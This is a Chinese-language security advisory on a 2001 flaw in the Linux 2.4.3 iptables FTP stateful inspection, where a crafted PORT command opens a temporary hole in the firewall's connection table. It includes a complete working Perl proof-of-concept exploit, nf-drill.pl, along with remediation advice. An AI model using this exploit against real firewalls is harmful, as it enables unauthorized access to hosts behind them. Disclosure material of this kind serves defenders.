IPTable的FTP stateful 检查存在任意过滤规则可插入漏洞发布时间:2001-04-21 更新时间:2001-04-21 严重程度:高 威胁程度:欺骗 错误类型:设计错误 利用方式:服务器模式 受影响系统 Linux kernel 2.4.3详细描述 LInux内核包含一个内建的防火墙实现称为IPTables,IPTable支持 多个应用程序协议如FTP的stateful检查,stateful检查模块是用来 当客户端或者服务器端在防火墙背后方便出端口连接。 当FTP PORT命令包含不同于由stateful-检查模块处理的客户端IP地址, 问题就会产生,尽管这个问题会被探测到,但这个环境会被错误的处理 导致一条PORT连接条目插入到'RELATED'表连接中,这就临时允许 从FTP服务端到目的端的通信通过防火墙。 攻击者可以利用这个漏洞从FTP服务器来访问未认证的主机。 测试代码 #!/usr/bin/perl # # nf-drill.pl --- "Drill" holes open in Linux iptables connection table # Author: Cristiano Lincoln Mattos <lincoln@cesar.org.br>, 2001 # # Advisory: http://www.tempest.com.br/advisories/linux-iptables # # Tempest Security Technologies - a business unit of: # CESAR - Centro de Estudos e Sistemas Avancados do Recife # # This code is licensed under the GPL. # use Socket; use Getopt::Long; use strict; # Option variables my $server; my $serverport = 21; my $host; my $port; my $verbose = 0; # Print function sub out { my ($level,$text) = @_; if (!$level || ($level && $verbose)) { print "$text"; } } my $opt = GetOptions("server=s" => \$server, "serverport=s" => \$serverport, "host=s" => \$host, "port=i" => \$port, "verbose" => \$verbose); if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) { print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n"; print " - server: specifies the FTP server (IP or hostname) to connect to\n"; print " - serverport: specifies the port of the FTP server -- default: 21\n"; print " - host: the IP of the target to open in the connection table\n"; print " - port: the port of the target to open in the connection table\n"; print " - verbose: sets verbose mode\n"; exit(0); } print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n"; print " Tempest Security Technologies\n\n"; # For the meanwhile, expecting an IP my @ip = split(/\./,$host); my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," . ($port >> 8) . "," . ($port % 256) . "\r\n"; # Socket init my $ipn = inet_aton($server); if (!$ipn) { out(0," Error: could not convert $server\n"); exit(0); } my $sin = sockaddr_in($serverport,$ipn); socket(Sock,PF_INET,SOCK_STREAM,6); if (!connect(Sock,$sin)) { out(0," Error: could not connect to $server:$serverport.\n"); exit(0); } out(0," - Connected to $server:$serverport\n"); my $buf; recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); # First send a dummy one, just to establish the connection in the iptables logic send(Sock,$str,0); out(1," - SEND: $str"); recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); # Now, send the one that will insert itself into the connection table send(Sock,$str,0); out(1," - SEND: $str"); recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n"); out(0," - Closing connection to $server:$serverport.\n\n"); close(Sock); 解决方案 建议关闭stateful inspection 模块。 REDHAT已经发布了一建议,默认情况下,REDHAT LINUX没有 配置使用IP TABLES而使用ipchains,REDHAT将很快升级内 核修补此问题。 NetFilter core 开发小组发布了一补丁: Linux kernel 2.4.3: Linux NetFilter Developers patch ftp-security.patch http://netfilter.samba.org/security-fix/ftp-security.patch 相关信息 |
